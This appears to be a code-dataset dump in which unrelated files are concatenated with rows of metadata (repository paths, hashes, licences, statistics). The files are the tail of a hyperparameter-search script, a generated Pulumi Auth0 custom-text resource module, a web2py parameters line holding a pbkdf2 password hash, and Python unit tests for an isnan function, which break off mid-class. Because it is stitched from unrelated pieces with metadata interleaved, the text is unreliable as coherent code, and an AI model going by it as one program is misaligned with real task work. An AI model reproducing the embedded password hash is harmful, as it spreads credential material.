skopt.space.Integer(*config.hyperpar_space['minibatch_size'], name='minibatch_size'),
skopt.space.Integer(*config.hyperpar_space['beam_width'], name='beam_width'),
],
n_initial_points=config.hyperpar_num_random_evals,
base_estimator='RF',
acq_func='EI',
acq_optimizer='auto',
random_state=0,
)
i = 0
already_seen = set()
best_hyperpar = None
best_cost = None
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search.txt', 'r', encoding='utf-8') as f:
for line in f.read().strip().split('\n')[1:]:
i += 1
[
entry_num,
init_method,
max_init_weight,
embed_size,
rnn_size,
post_image_size,
pre_output_size,
post_image_activation,
rnn_type,
optimizer,
learning_rate,
normalize_image,
weights_reg_weight,
image_dropout_prob,
post_image_dropout_prob,
embedding_dropout_prob,
rnn_dropout_prob,
max_gradient_norm,
minibatch_size,
beam_width,
cost,
duration,
] = line.split('\t')
next_hyperpar = [
init_method,
float(max_init_weight),
int(embed_size),
int(rnn_size),
int(post_image_size),
int(pre_output_size) if pre_output_size != 'None' else None,
post_image_activation,
rnn_type,
optimizer,
float(learning_rate),
normalize_image == 'True',
float(weights_reg_weight),
float(image_dropout_prob),
float(post_image_dropout_prob),
float(embedding_dropout_prob),
float(rnn_dropout_prob),
float(max_gradient_norm),
int(minibatch_size),
int(beam_width),
]
cost = -float(cost)
duration = int(duration)
if i < config.hyperpar_num_random_evals + config.hyperpar_num_evals:
num_hyperpars = 1
while standardize_hyperpar(opt.ask(num_hyperpars)[-1]) != next_hyperpar:
print(i, '<<FOUND HYPERPARAMS THAT RESULTED IN ERRORS LAST TIME>>')
num_hyperpars += 1
opt.tell(prepare_hyperpar_for_tell(next_hyperpar), cost)
if best_cost is None or cost < best_cost:
best_hyperpar = next_hyperpar
best_cost = cost
already_seen.add(tuple(next_hyperpar))
print(i, *next_hyperpar, -cost, lib.format_duration(duration), '******' if cost == best_cost else '', sep='\t')
for _ in range(i, config.hyperpar_num_random_evals + config.hyperpar_num_evals):
i += 1
num_hyperpars = 1
while True:
t = lib.Timer()
next_hyperpar = standardize_hyperpar(opt.ask(num_hyperpars)[-1]) #This allows us to get different hyperparameters every time the previous hyperparameters resulted in <<SEEN>>, <<NAN>>, or <<EMPTY>>
num_hyperpars += 1
print(i, *next_hyperpar, sep='\t', end='\t')
if tuple(next_hyperpar) in already_seen:
duration = t.get_duration()
print('<<SEEN>>', lib.format_duration(duration), sep='\t')
continue
try:
cost = objective(next_hyperpar)
except model_neural_trad.NotANumberError:
duration = t.get_duration()
print('<<NAN>>', lib.format_duration(duration), sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search_errors.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, 'nan', duration, sep='\t', file=f)
continue
except model_neural_trad.EmptyBeamError:
duration = t.get_duration()
print('<<EMPTY>>', lib.format_duration(duration), sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search_errors.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, 'empty', duration, sep='\t', file=f)
continue
break
duration = t.get_duration()
opt.tell(prepare_hyperpar_for_tell(next_hyperpar), cost)
if best_cost is None or cost < best_cost:
best_hyperpar = next_hyperpar
best_cost = cost
already_seen.add(tuple(next_hyperpar))
print(-cost, lib.format_duration(duration), '******' if cost == best_cost else '', sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, -cost, duration, sep='\t', file=f)
print('-'*100)
print(lib.formatted_clock())
print('best found:')
print('', *best_hyperpar, -best_cost, sep='\t')
print()
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_best.txt', 'w', encoding='utf-8') as f:
print('WMD', -best_cost, sep='\t', file=f)
print('init_method', best_hyperpar[0], sep='\t', file=f)
print('max_init_weight', best_hyperpar[1], sep='\t', file=f)
print('embed_size', best_hyperpar[2], sep='\t', file=f)
print('rnn_size', best_hyperpar[3], sep='\t', file=f)
print('post_image_size', best_hyperpar[4], sep='\t', file=f)
print('pre_output_size', best_hyperpar[5], sep='\t', file=f)
print('post_image_activation', best_hyperpar[6], sep='\t', file=f)
print('rnn_type', best_hyperpar[7], sep='\t', file=f)
print('optimizer', best_hyperpar[8], sep='\t', file=f)
print('learning_rate', best_hyperpar[9], sep='\t', file=f)
print('normalize_image', best_hyperpar[10], sep='\t', file=f)
print('weights_reg_weight', best_hyperpar[11], sep='\t', file=f)
print('image_dropout_prob', best_hyperpar[12], sep='\t', file=f)
print('post_image_dropout_prob', best_hyperpar[13], sep='\t', file=f)
print('embedding_dropout_prob', best_hyperpar[14], sep='\t', file=f)
print('rnn_dropout_prob', best_hyperpar[15], sep='\t', file=f)
print('max_gradient_norm', best_hyperpar[16], sep='\t', file=f)
print('minibatch_size', best_hyperpar[17], sep='\t', file=f)
print('beam_width', best_hyperpar[18], sep='\t', file=f)
| 44.761905 | 266 | 0.541337 | 3,415 | 32,900 | 4.888141 | 0.081406 | 0.057329 | 0.024441 | 0.027497 | 0.889055 | 0.8736 | 0.8609 | 0.832205 | 0.813934 | 0.789852 | 0 | 0.007498 | 0.335167 | 32,900 | 735 | 267 | 44.761905 | 0.755681 | 0.010334 | 0 | 0.784848 | 0 | 0 | 0.151006 | 0.022604 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007576 | false | 0 | 0.015152 | 0.001515 | 0.030303 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6d805bff175791caf9195520475e0e36196e9d1a | 18,825 | py | Python | sdk/python/pulumi_auth0/prompt_custom_text.py | kevinschoonover/pulumi-auth0 | 18a1ae8fde65291d9e49d6bbc9bb6a5b0eb5dd8a | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_auth0/prompt_custom_text.py | kevinschoonover/pulumi-auth0 | 18a1ae8fde65291d9e49d6bbc9bb6a5b0eb5dd8a | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_auth0/prompt_custom_text.py | kevinschoonover/pulumi-auth0 | 18a1ae8fde65291d9e49d6bbc9bb6a5b0eb5dd8a | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['PromptCustomTextArgs', 'PromptCustomText']
@pulumi.input_type
class PromptCustomTextArgs:
    """The set of arguments for constructing a `PromptCustomText` resource.

    All three inputs are required by the provider; each is stored via
    `pulumi.set` so the Pulumi input machinery can track them.
    """

    def __init__(__self__, *,
                 body: pulumi.Input[str],
                 language: pulumi.Input[str],
                 prompt: pulumi.Input[str]):
        """
        The set of arguments for constructing a PromptCustomText resource.
        :param pulumi.Input[str] body: JSON document containing the custom texts. The available keys for each prompt are listed at https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts#prompt-values
        :param pulumi.Input[str] language: Language code of the custom text (e.g. `en`, `fr-CA`, `pt-BR`, `zh-TW`). See the Auth0 documentation for the full list of supported codes.
        :param pulumi.Input[str] prompt: The login-flow step the text applies to (e.g. `login`, `signup`, `reset-password`, `mfa`, `consent`, `common`). See the Auth0 documentation for the full list of prompt names.
        """
        pulumi.set(__self__, "body", body)
        pulumi.set(__self__, "language", language)
        pulumi.set(__self__, "prompt", prompt)

    @property
    @pulumi.getter
    def body(self) -> pulumi.Input[str]:
        """
        JSON document containing the custom texts for the selected prompt.
        """
        return pulumi.get(self, "body")

    @body.setter
    def body(self, value: pulumi.Input[str]):
        pulumi.set(self, "body", value)

    @property
    @pulumi.getter
    def language(self) -> pulumi.Input[str]:
        """
        Language code of the custom text (e.g. `en`, `fr-CA`, `zh-TW`).
        """
        return pulumi.get(self, "language")

    @language.setter
    def language(self, value: pulumi.Input[str]):
        pulumi.set(self, "language", value)

    @property
    @pulumi.getter
    def prompt(self) -> pulumi.Input[str]:
        """
        The login-flow step the text applies to (e.g. `login`, `signup`, `mfa`).
        """
        return pulumi.get(self, "prompt")

    @prompt.setter
    def prompt(self, value: pulumi.Input[str]):
        pulumi.set(self, "prompt", value)
@pulumi.input_type
class _PromptCustomTextState:
    """Input properties used for looking up and filtering `PromptCustomText`
    resources.

    Unlike `PromptCustomTextArgs`, every field is optional here: state lookups
    may supply any subset of the properties, so each is only stored when it is
    not ``None``.
    """

    def __init__(__self__, *,
                 body: Optional[pulumi.Input[str]] = None,
                 language: Optional[pulumi.Input[str]] = None,
                 prompt: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering PromptCustomText resources.
        :param pulumi.Input[str] body: JSON document containing the custom texts. The available keys for each prompt are listed at https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts#prompt-values
        :param pulumi.Input[str] language: Language code of the custom text (e.g. `en`, `fr-CA`, `pt-BR`, `zh-TW`). See the Auth0 documentation for the full list of supported codes.
        :param pulumi.Input[str] prompt: The login-flow step the text applies to (e.g. `login`, `signup`, `reset-password`, `mfa`, `consent`, `common`). See the Auth0 documentation for the full list of prompt names.
        """
        if body is not None:
            pulumi.set(__self__, "body", body)
        if language is not None:
            pulumi.set(__self__, "language", language)
        if prompt is not None:
            pulumi.set(__self__, "prompt", prompt)

    @property
    @pulumi.getter
    def body(self) -> Optional[pulumi.Input[str]]:
        """
        JSON document containing the custom texts for the selected prompt.
        """
        return pulumi.get(self, "body")

    @body.setter
    def body(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "body", value)

    @property
    @pulumi.getter
    def language(self) -> Optional[pulumi.Input[str]]:
        """
        Language code of the custom text (e.g. `en`, `fr-CA`, `zh-TW`).
        """
        return pulumi.get(self, "language")

    @language.setter
    def language(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "language", value)

    @property
    @pulumi.getter
    def prompt(self) -> Optional[pulumi.Input[str]]:
        """
        The login-flow step the text applies to (e.g. `login`, `signup`, `mfa`).
        """
        return pulumi.get(self, "prompt")

    @prompt.setter
    def prompt(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "prompt", value)
class PromptCustomText(pulumi.CustomResource):
    # NOTE: auto-generated by the Pulumi Terraform Bridge (tfgen); the
    # overloaded __init__ stubs exist only for type checkers — the real
    # dispatch happens in the un-decorated __init__ below.

    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 body: Optional[pulumi.Input[str]] = None,
                 language: Optional[pulumi.Input[str]] = None,
                 prompt: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        With this resource, you can manage custom text on your Auth0 prompts. You can read more about custom texts
        [here](https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts).

        ## Example Usage

        ```python
        import pulumi
        import json
        import pulumi_auth0 as auth0

        example = auth0.PromptCustomText("example",
            prompt="login",
            language="en",
            body=json.dumps({
                "login": {
                    "title": "Welcome",
                    "description": "Login to",
                    "buttonText": "Continue",
                },
            }))
        ```

        ## Import

        auth0_prompt_custom_text can be imported using the import command and specifying the prompt and language separated by `:`, e.g.

        ```sh
        $ pulumi import auth0:index/promptCustomText:PromptCustomText example login:en
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] body: JSON document containing the custom texts. The available keys for each prompt are listed at https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts#prompt-values
        :param pulumi.Input[str] language: Language code of the custom text (e.g. `en`, `fr-CA`, `pt-BR`, `zh-TW`). See the Auth0 documentation for the full list of supported codes.
        :param pulumi.Input[str] prompt: The login-flow step the text applies to (e.g. `login`, `signup`, `reset-password`, `mfa`, `consent`, `common`). See the Auth0 documentation for the full list of prompt names.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: PromptCustomTextArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        With this resource, you can manage custom text on your Auth0 prompts. You can read more about custom texts
        [here](https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts).

        See the keyword-argument overload above for a usage and import example.

        :param str resource_name: The name of the resource.
        :param PromptCustomTextArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads: an args-object call goes through
        # resource_args, a keyword-argument call falls through to kwargs.
        resource_args, opts = _utilities.get_resource_args_opts(PromptCustomTextArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       body: Optional[pulumi.Input[str]] = None,
                       language: Optional[pulumi.Input[str]] = None,
                       prompt: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Shared implementation behind both __init__ overloads: validates
        # options, fills in the provider version, and registers the resource.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (as opposed to looking one up by id):
            # all three properties are required unless resolving from a URN.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = PromptCustomTextArgs.__new__(PromptCustomTextArgs)

            if body is None and not opts.urn:
                raise TypeError("Missing required property 'body'")
            __props__.__dict__["body"] = body
            if language is None and not opts.urn:
                raise TypeError("Missing required property 'language'")
            __props__.__dict__["language"] = language
            if prompt is None and not opts.urn:
                raise TypeError("Missing required property 'prompt'")
            __props__.__dict__["prompt"] = prompt
        super(PromptCustomText, __self__).__init__(
            'auth0:index/promptCustomText:PromptCustomText',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            body: Optional[pulumi.Input[str]] = None,
            language: Optional[pulumi.Input[str]] = None,
            prompt: Optional[pulumi.Input[str]] = None) -> 'PromptCustomText':
        """
        Get an existing PromptCustomText resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] body: JSON document containing the custom texts. The available keys for each prompt are listed at https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts#prompt-values
        :param pulumi.Input[str] language: Language code of the custom text (e.g. `en`, `fr-CA`, `pt-BR`, `zh-TW`). See the Auth0 documentation for the full list of supported codes.
        :param pulumi.Input[str] prompt: The login-flow step the text applies to (e.g. `login`, `signup`, `reset-password`, `mfa`, `consent`, `common`). See the Auth0 documentation for the full list of prompt names.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _PromptCustomTextState.__new__(_PromptCustomTextState)

        __props__.__dict__["body"] = body
        __props__.__dict__["language"] = language
        __props__.__dict__["prompt"] = prompt
        return PromptCustomText(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def body(self) -> pulumi.Output[str]:
        """
        JSON document containing the custom texts for the selected prompt.
        """
        return pulumi.get(self, "body")

    @property
    @pulumi.getter
    def language(self) -> pulumi.Output[str]:
        """
        Language code of the custom text (e.g. `en`, `fr-CA`, `zh-TW`).
        """
        return pulumi.get(self, "language")

    @property
    @pulumi.getter
    def prompt(self) -> pulumi.Output[str]:
        """
        The login-flow step the text applies to (e.g. `login`, `signup`, `mfa`).
        """
        return pulumi.get(self, "prompt")
| 56.531532 | 494 | 0.5949 | 2,223 | 18,825 | 4.928475 | 0.124157 | 0.043173 | 0.052391 | 0.036145 | 0.829317 | 0.802209 | 0.797371 | 0.779482 | 0.770354 | 0.765699 | 0 | 0.001613 | 0.24255 | 18,825 | 332 | 495 | 56.701807 | 0.766744 | 0.605206 | 0 | 0.537415 | 1 | 0 | 0.081833 | 0.007109 | 0 | 0 | 0 | 0 | 0 | 1 | 0.14966 | false | 0.006803 | 0.034014 | 0 | 0.272109 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6d91a828d903dc9048d1c82c5cebc9abf5807a62 | 94 | py | Python | ips/ip/spi_master_kl/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | ips/ip/spi_master_kl/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | ips/ip/spi_master_kl/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | from spi_master_kl_partial import get_ip_name
from spi_master_kl_partial import SPI_MASTER_KL
| 31.333333 | 47 | 0.914894 | 18 | 94 | 4.222222 | 0.5 | 0.355263 | 0.434211 | 0.394737 | 0.736842 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 94 | 2 | 48 | 47 | 0.883721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
a3038a55b9a3861f3c1acaec266b7a84ec312876 | 92 | py | Python | parameters_8000.py | altemirjosecoelho/w2p-helpdesk | f13c98854995933b4b6fd13cde678db880751ada | [
"BSD-3-Clause"
] | null | null | null | parameters_8000.py | altemirjosecoelho/w2p-helpdesk | f13c98854995933b4b6fd13cde678db880751ada | [
"BSD-3-Clause"
] | null | null | null | parameters_8000.py | altemirjosecoelho/w2p-helpdesk | f13c98854995933b4b6fd13cde678db880751ada | [
"BSD-3-Clause"
] | null | null | null | password="pbkdf2(1000,20,sha512)$82ba68e785a75529$b728cc8335ec9429e9143314acbfbc786156bd70"
| 46 | 91 | 0.891304 | 7 | 92 | 11.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.527473 | 0.01087 | 92 | 1 | 92 | 92 | 0.373626 | 0 | 0 | 0 | 0 | 0 | 0.869565 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
a304f053233187bf607345ef6fa3b7512fef4787 | 15,131 | py | Python | unittest/test_isnan.py | m1griffin/arrayfunc | df57097699c25d3e949e1ade307ed61eaa5728c2 | [
"Apache-2.0"
] | 2 | 2017-08-28T08:41:16.000Z | 2018-05-29T03:49:36.000Z | unittest/test_isnan.py | m1griffin/arrayfunc | df57097699c25d3e949e1ade307ed61eaa5728c2 | [
"Apache-2.0"
] | null | null | null | unittest/test_isnan.py | m1griffin/arrayfunc | df57097699c25d3e949e1ade307ed61eaa5728c2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
##############################################################################
# Project: arrayfunc
# Module: test_isnan.py
# Purpose: arrayfunc unit test.
# Language: Python 3.4
# Date: 09-Dec-2017.
# Ver: 06-Mar-2020.
#
###############################################################################
#
# Copyright 2014 - 2020 Michael Griffin <m12.griffin@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##############################################################################
"""This conducts unit tests for isnan.
"""
##############################################################################
import sys
import array
import itertools
import math
import operator
import platform
import copy
import unittest
import arrayfunc
##############################################################################
##############################################################################
# The following code is all auto-generated.
##############################################################################
class isnan_general_nan_f(unittest.TestCase):
	"""Test for basic general function operation with nan data - array code f.

	test_template_nonfinite
	"""

	def setUp(self):
		"""Initialise: a 'f' array of finite values with one nan in the middle.
		"""
		xdata = [-5.0, -1.0, 0.0, 0.4, 0.8, 1.2, 1.6, 2.0, 2.4, 2.8, 3.2, 3.6]
		# One nan embedded between two runs of finite data.
		self.data = array.array('f', xdata + [math.nan] + xdata)
		# Expected result over the whole array.
		self.expected = any(math.isnan(x) for x in self.data)
		# For the maxlen test only the first half of the array is examined;
		# the nan sits beyond that boundary, so the limited result differs.
		self.limited = len(self.data) // 2
		limresults = [math.isnan(x) for x in self.data]
		self.expectedlim = any(limresults[:self.limited])

	def test_isnan_a1(self):
		"""Test isnan basic - Array code f.
		"""
		result = arrayfunc.isnan(self.data)
		self.assertEqual(result, self.expected)

	def test_isnan_a2(self):
		"""Test isnan basic for return type - Array code f.
		"""
		result = arrayfunc.isnan(self.data)
		self.assertIsInstance(result, bool)

	def test_isnan_b1(self):
		"""Test isnan with array maxlen - Array code f.
		"""
		result = arrayfunc.isnan(self.data, maxlen=self.limited)
		self.assertEqual(result, self.expectedlim)
##############################################################################
##############################################################################
class isnan_param_errors_nan_f(unittest.TestCase):
	"""Test for invalid parameters - array code f.

	param_invalid_template
	"""

	def setUp(self):
		"""Initialise: valid float arrays plus an integer array used to
		check that the wrong array type is rejected.
		"""
		xdata = [-5.0, -1.0, 0.0, 0.4, 0.8, 1.2, 1.6, 2.0, 2.4, 2.8, 3.2, 3.6]
		# Finite data followed by an equal-length run of nans.
		self.floatarray = array.array('f', xdata + [math.nan] * len(xdata))
		self.floatarray2 = copy.copy(self.floatarray)
		self.testmaxlen = len(self.floatarray) // 2
		# Integer equivalent: isnan only accepts float arrays.
		self.intarray = array.array('i', [int(x) for x in xdata + xdata])

	def test_isnan_a1(self):
		"""Test isnan for integer array - Array code f.
		"""
		# This version is expected to pass.
		result = arrayfunc.isnan(self.floatarray)
		# This is the actual test.
		with self.assertRaises(TypeError):
			result = arrayfunc.isnan(self.intarray)

	def test_isnan_b1(self):
		"""Test isnan for maxlen='a' - Array code f.
		"""
		# This version is expected to pass.
		result = arrayfunc.isnan(self.floatarray, maxlen=self.testmaxlen)
		# This is the actual test.
		with self.assertRaises(TypeError):
			result = arrayfunc.isnan(self.floatarray2, maxlen='a')

	def test_isnan_c1(self):
		"""Test isnan for matherrors=True (unsupported option) - Array code f.
		"""
		# This version is expected to pass.
		result = arrayfunc.isnan(self.floatarray)
		# This is the actual test.
		with self.assertRaises(TypeError):
			result = arrayfunc.isnan(self.floatarray2, matherrors=True)

	def test_isnan_d1(self):
		"""Test isnan for missing array - Array code f.
		"""
		with self.assertRaises(TypeError):
			result = arrayfunc.isnan()

	def test_isnan_d2(self):
		"""Test isnan for missing array with maxlen - Array code f.
		"""
		with self.assertRaises(TypeError):
			result = arrayfunc.isnan(maxlen=self.testmaxlen)

	def test_isnan_no_params_d3(self):
		"""Test isnan with no parameters - Array code f.
		"""
		with self.assertRaises(TypeError):
			result = arrayfunc.isnan()
##############################################################################
##############################################################################
class isnan_nan_f(unittest.TestCase):
	"""Test for correct results for each of the non-finite data conditions.

	nan_template
	"""

	def setUp(self):
		"""Initialise: arrays with no nan, and with a nan at the centre,
		start, and end positions respectively.
		"""
		xdata = [-5.0, -1.0, 0.0, 0.4, 0.8, 1.2, 1.6, 2.0, 2.4, 2.8, 3.2, 3.6]
		datanan = [math.nan]
		self.cleandata = array.array('f', xdata + xdata)
		self.testdatacentre = array.array('f', xdata + datanan + xdata)
		self.testdatastart = array.array('f', datanan + xdata + xdata)
		self.testdataend = array.array('f', xdata + xdata + datanan)

	def test_isnan_a1(self):
		"""Test isnan no value to find - Array code f.
		"""
		result = arrayfunc.isnan(self.cleandata)
		expected = any(math.isnan(x) for x in self.cleandata)
		# Should not find the value.
		self.assertEqual(result, expected)

	def test_isnan_a2(self):
		"""Test isnan value to find in centre - Array code f.
		"""
		result = arrayfunc.isnan(self.testdatacentre)
		expected = any(math.isnan(x) for x in self.testdatacentre)
		# Should find the value.
		self.assertEqual(result, expected)

	def test_isnan_a3(self):
		"""Test isnan value to find at start - Array code f.
		"""
		result = arrayfunc.isnan(self.testdatastart)
		expected = any(math.isnan(x) for x in self.testdatastart)
		# Should find the value.
		self.assertEqual(result, expected)

	def test_isnan_a4(self):
		"""Test isnan value to find at end - Array code f.
		"""
		result = arrayfunc.isnan(self.testdataend)
		expected = any(math.isnan(x) for x in self.testdataend)
		# Should find the value.
		self.assertEqual(result, expected)

	def test_isnan_b1(self):
		"""Test isnan value to find beyond maxlen parameter - Array code f.
		"""
		# The nan is the last element, so excluding it via maxlen means it
		# must not be found.
		result = arrayfunc.isnan(self.testdataend, maxlen=len(self.testdataend) - 1)
		expected = any(math.isnan(x) for x in self.testdataend[:len(self.testdataend) - 1])
		self.assertEqual(result, expected)
##############################################################################
##############################################################################
class isnan_general_nan_d(unittest.TestCase):
	"""Test for basic general function operation with nan data - array code d.

	test_template_nonfinite
	"""

	def setUp(self):
		"""Initialise: a 'd' array of finite values with one nan in the middle.
		"""
		xdata = [-5.0, -1.0, 0.0, 0.4, 0.8, 1.2, 1.6, 2.0, 2.4, 2.8, 3.2, 3.6]
		# One nan embedded between two runs of finite data.
		self.data = array.array('d', xdata + [math.nan] + xdata)
		# Expected result over the whole array.
		self.expected = any(math.isnan(x) for x in self.data)
		# For the maxlen test only the first half of the array is examined;
		# the nan sits beyond that boundary, so the limited result differs.
		self.limited = len(self.data) // 2
		limresults = [math.isnan(x) for x in self.data]
		self.expectedlim = any(limresults[:self.limited])

	def test_isnan_a1(self):
		"""Test isnan basic - Array code d.
		"""
		result = arrayfunc.isnan(self.data)
		self.assertEqual(result, self.expected)

	def test_isnan_a2(self):
		"""Test isnan basic for return type - Array code d.
		"""
		result = arrayfunc.isnan(self.data)
		self.assertIsInstance(result, bool)

	def test_isnan_b1(self):
		"""Test isnan with array maxlen - Array code d.
		"""
		result = arrayfunc.isnan(self.data, maxlen=self.limited)
		self.assertEqual(result, self.expectedlim)
##############################################################################
##############################################################################
class isnan_param_errors_nan_d(unittest.TestCase):
    """Test for invalid parameters.
    param_invalid_template
    """

    def setUp(self):
        """Initialise.
        """
        values = [-5.0, -1.0, 0.0, 0.4, 0.8, 1.2, 1.6, 2.0, 2.4, 2.8, 3.2, 3.6]
        self.floatarray = array.array('d', values + [math.nan] * len(values))
        self.floatarray2 = copy.copy(self.floatarray)
        self.testmaxlen = len(self.floatarray) // 2
        # Integer equivalent, used to provoke a type error.
        self.intarray = array.array('i', [int(v) for v in values + values])

    def test_isnan_a1(self):
        """Test isnan for integer array - Array code d.
        """
        # Sanity check: the float array form is accepted.
        result = arrayfunc.isnan(self.floatarray)
        # The actual test: an integer array must be rejected.
        with self.assertRaises(TypeError):
            result = arrayfunc.isnan(self.intarray)

    def test_isnan_b1(self):
        """Test isnan for maxlen='a' - Array code d.
        """
        # Sanity check: a numeric maxlen is accepted.
        result = arrayfunc.isnan(self.floatarray, maxlen=self.testmaxlen)
        # The actual test: a non-numeric maxlen must be rejected.
        with self.assertRaises(TypeError):
            result = arrayfunc.isnan(self.floatarray2, maxlen='a')

    def test_isnan_c1(self):
        """Test isnan for matherrors=True (unsupported option) - Array code d.
        """
        # Sanity check: the plain call is accepted.
        result = arrayfunc.isnan(self.floatarray)
        # The actual test: matherrors is not a supported option here.
        with self.assertRaises(TypeError):
            result = arrayfunc.isnan(self.floatarray2, matherrors=True)

    def test_isnan_d1(self):
        """Test isnan for missing array - Array code d.
        """
        with self.assertRaises(TypeError):
            result = arrayfunc.isnan()

    def test_isnan_d2(self):
        """Test isnan for missing array with maxlen - Array code d.
        """
        with self.assertRaises(TypeError):
            result = arrayfunc.isnan(maxlen=self.testmaxlen)

    def test_isnan_no_params_d3(self):
        """Test isnan with no parameters - Array code d.
        """
        with self.assertRaises(TypeError):
            result = arrayfunc.isnan()
##############################################################################
##############################################################################
class isnan_nan_d(unittest.TestCase):
    """Test for correct results for each of the non-finite data conditions.
    nan_template
    """

    def setUp(self):
        """Initialise.
        """
        values = [-5.0, -1.0, 0.0, 0.4, 0.8, 1.2, 1.6, 2.0, 2.4, 2.8, 3.2, 3.6]
        nan = [math.nan]
        self.cleandata = array.array('d', values * 2)
        self.testdatacentre = array.array('d', values + nan + values)
        self.testdatastart = array.array('d', nan + values * 2)
        self.testdataend = array.array('d', values * 2 + nan)

    def _check(self, data):
        # Compare arrayfunc.isnan against the pure Python reference.
        reference = any(math.isnan(v) for v in data)
        self.assertEqual(arrayfunc.isnan(data), reference)

